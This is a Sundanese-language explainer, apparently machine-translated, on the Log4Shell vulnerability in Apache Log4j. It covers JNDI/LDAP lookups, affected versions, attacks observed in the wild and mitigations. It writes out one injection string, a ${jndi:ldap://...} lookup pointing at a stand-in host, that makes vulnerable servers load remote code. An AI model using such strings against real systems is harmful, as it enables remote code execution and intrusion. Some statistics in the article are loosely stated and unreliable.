Daptar eusi[Sumputkeun][Témbongkeun]
Dina ahir Nopémber 2021, kami mendakan ancaman utama pikeun cybersecurity. Eksploitasi ieu berpotensi mangaruhan jutaan sistem komputer di sakuliah dunya.
Ieu mangrupikeun pituduh ngeunaan kerentanan Log4j sareng kumaha cacad desain anu teu ditingali ngantepkeun langkung ti 90% tina jasa komputer di dunya dibuka pikeun nyerang.
Apache Log4j mangrupikeun utilitas logging berbasis Java open-source anu dikembangkeun ku Apache Software Foundation. Asalna ditulis ku Ceki Gülcü di 2001, ayeuna bagian tina Apache Logging Services, hiji proyék ti Apache Software Foundation.
Pausahaan di sakuliah dunya ngagunakeun perpustakaan Log4j pikeun ngaktipkeun logging kana aplikasi maranéhanana. Nyatana, perpustakaan Java aya dimana-mana, anjeun tiasa mendakanana dina aplikasi ti Amazon, Microsoft, Google, sareng seueur deui.
The prominence sahiji perpustakaan hartina sagala cacad poténsial dina kode bisa ninggalkeun jutaan komputer kabuka pikeun Hacking. Dina 24 Nopémber 2021, a kaamanan awan panalungtik gawe Alibaba manggihan hiji cacad dahsyat.
The Log4j kerentanan, ogé katelah Log4Shell, eksis unnoticed saprak 2013. The kerentanan diwenangkeun aktor jahat ngajalankeun kode dina sistem kapangaruhan ngajalankeun Log4j. Ieu diungkabkeun sacara umum dina 9 Désémber 2021
Ahli industri nyauran cacad Log4Shell kerentanan pangbadagna dina mémori panganyarna.
Dina saminggu saatos publikasi kerentanan, tim cybersecurity mendakan jutaan serangan. Sababaraha peneliti malah observasi laju leuwih saratus serangan per menit.
Kumaha carana sangkan eta pagawean?
Pikeun ngartos naha Log4Shell bahaya pisan, urang kedah ngartos naon anu tiasa dilakukeun.
Kerentanan Log4Shell ngamungkinkeun palaksanaan kode sawenang-wenang, anu dasarna hartosna panyerang tiasa ngajalankeun paréntah atanapi kode naon waé dina mesin target.
Kumaha éta ngalengkepan ieu?
Kahiji, urang kudu ngarti naon JNDI.
Java Naming and Directory Interface (JNDI) mangrupikeun jasa Java anu ngamungkinkeun program Java mendakan sareng milarian data sareng sumber liwat nami. Ladenan diréktori ieu penting sabab nyayogikeun sét rékaman anu teratur pikeun pangembang pikeun gampang ngarujuk nalika nyiptakeun aplikasi.
JNDI tiasa nganggo sababaraha protokol pikeun ngaksés diréktori anu tangtu. Salah sahiji protokol ieu nyaéta Lightweight Directory Access Protocol, atanapi LDAP.
Nalika logging string, log4j ngalakukeun substitusi string nalika aranjeunna sapatemon ekspresi formulir ${prefix:name}
.
Salaku conto, Text: ${java:version}
bisa jadi asup salaku Téks: Vérsi Java 1.8.0_65. Jenis substitusi ieu lumrah.
Urang ogé tiasa gaduh ekspresi sapertos Text: ${jndi:ldap://example.com/file}
nu ngagunakeun sistem JNDI pikeun ngamuat hiji objek Java ti URL ngaliwatan protokol LDAP.
Ieu sacara efektif ngamuat data anu asalna tina URL éta kana mesin. Sakur hacker poténsial tiasa janten host kode jahat dina URL umum sareng ngantosan mesin anu nganggo Log4j pikeun asup.
Kusabab eusi pesen log ngandung data anu dikawasa ku pangguna, peretas tiasa nyelapkeun rujukan JNDI sorangan anu nunjuk ka server LDAP anu aranjeunna kontrol. Server LDAP ieu tiasa pinuh ku objék Java anu jahat anu JNDI tiasa dieksekusi ngaliwatan kerentanan.
Anu ngajadikeun ieu parah nyaéta henteu masalah upami aplikasina mangrupikeun sisi-server atanapi aplikasi sisi klien.
Salami aya cara pikeun logger maca kode jahat panyerang, aplikasina masih kabuka pikeun eksploitasi.
Saha anu kapangaruhan?
Kerentanan mangaruhan sadaya sistem sareng jasa anu nganggo APache Log4j, sareng versi 2.0 dugi ka sareng kalebet 2.14.1.
Sababaraha ahli kaamanan mamatahan yén kerentanan tiasa mangaruhan sababaraha aplikasi nganggo Java.
Cacat ieu munggaran kapanggih dina kaulinan vidéo Minecraft milik Microsoft. Microsoft geus ngadesek pamaké maranéhanana pikeun ngamutahirkeun software Minecraft édisi Java maranéhna pikeun nyegah resiko nanaon.
Jen Easterly, Diréktur Cybersecurity and Infrastructure Security Agency (CISA) nyatakeun yén padagang ngagaduhan tanggung jawab utama pikeun nyegah pangguna akhir tina aktor jahat anu ngamangpaatkeun kerentanan ieu.
"Vendor ogé kedah komunikasi sareng para palangganna pikeun mastikeun pangguna akhir terang yén produkna ngandung kerentanan ieu sareng kedah prioritas apdet parangkat lunak."
Serangan dilaporkeun parantos dimimitian. Symantec, perusahaan anu nyayogikeun parangkat lunak cybersecurity, parantos niténan sajumlah rupa-rupa paménta serangan.
Ieu sababaraha conto jinis serangan anu dideteksi ku panaliti:
- botnets
Botnet mangrupikeun jaringan komputer anu aya dina kadali pihak anu nyerang. Aranjeunna ngabantosan serangan DDoS, maok data, sareng panipuan sanés. Panaliti niténan botnet Muhstik dina skrip cangkang anu diunduh tina eksploitasi Log4j.
- XMRig Miner Trojan
XMRig mangrupikeun panambang cryptocurrency open-source anu ngagunakeun CPU pikeun nambang token Monero. Penjahat siber tiasa masang XMRig dina alat jalma supados tiasa ngagunakeun kakuatan ngolahna tanpa kanyahoan.
- Khonsari Ransomware
Ransomware ngarujuk kana bentuk malware anu dirancang pikeun encrypt file dina komputer. Panyerang teras tiasa nungtut bayaran kanggo tukeran pikeun masihan aksés deui kana file énkripsi. Panaliti mendakan ransomware Khonsari dina serangan Log4Shell. Aranjeunna nargétkeun server Windows sareng nganggo kerangka .NET.
Naon kajadian salajengna?
Para ahli ngaduga butuh sababaraha bulan atanapi malah sababaraha taun kanggo ngalereskeun huru-hara anu disababkeun ku kerentanan Log4J.
Proses ieu ngalibatkeun ngamutahirkeun unggal sistem anu kapangaruhan ku versi anu ditambal. Sanaos sadaya sistem ieu ditambal, masih aya ancaman anu aya kamungkinan backdoors anu hacker parantos parantos nambihan kana jandela yén server dibuka pikeun serangan.
loba solusi sareng mitigasi aya pikeun nyegah aplikasi dieksploitasi ku bug ieu. Versi Log4j anyar 2.15.0-rc1 ngarobih sababaraha setélan pikeun ngirangan kerentanan ieu.
Sadaya fitur anu nganggo JNDI bakal ditumpurkeun sacara standar sareng pamariksaan jarak jauh ogé diwatesan. Nganonaktipkeun fitur lookup dina setelan Log4j anjeun bakal mantuan ngurangan résiko eksploitasi mungkin.
Di luar Log4j, masih peryogi rencana anu langkung lega pikeun nyegah eksploitasi sumber terbuka.
Baheula dina Méi, White House ngarilis hiji urutan eksekutif nu aimed pikeun ngaronjatkeun cybersecurity nasional. Éta kalebet sasadiaan pikeun tagihan bahan perangkat lunak (SBOM) anu dasarna mangrupikeun dokumén formal anu ngandung daptar unggal barang anu diperyogikeun pikeun ngawangun aplikasi.
Ieu kalebet bagian sapertos open source bungkusan, kagumantungan, sareng API anu dianggo pikeun pangwangunan. Sanaos ideu SBOM ngabantosan transparansi, naha éta leres-leres ngabantosan konsumen?
Ngaronjatkeun kagumantungan bisa jadi loba teuing repot. Pausahaan ngan ukur tiasa milih mayar denda naon waé tibatan résiko miceunan waktos tambahan milarian pakét alternatif. Sugan SBOMs ieu ngan bakal mangpaat lamun maranéhna wengkuan diwatesan salajengna.
kacindekan
Masalah Log4j langkung ti ngan ukur masalah téknis pikeun organisasi.
Pamingpin bisnis kedah sadar kana poténsi résiko anu tiasa kajantenan nalika server, produk, atanapi jasa ngandelkeun kode anu aranjeunna henteu mertahankeun.
Ngandelkeun aplikasi open-source sareng pihak katilu sok aya sababaraha résiko. Pausahaan kedah nimbang-nimbang damel strategi mitigasi résiko sateuacan ancaman anyar muncul.
Seueur wéb ngandelkeun parangkat lunak open-source anu dijaga ku rébuan sukarelawan di sakuliah dunya.
Upami urang hoyong ngajaga wéb janten tempat anu aman, pamaréntah sareng korporasi kedah investasi pikeun ngabiayaan usaha open source sareng agénsi cybersecurity sapertos CISA.
Leave a Reply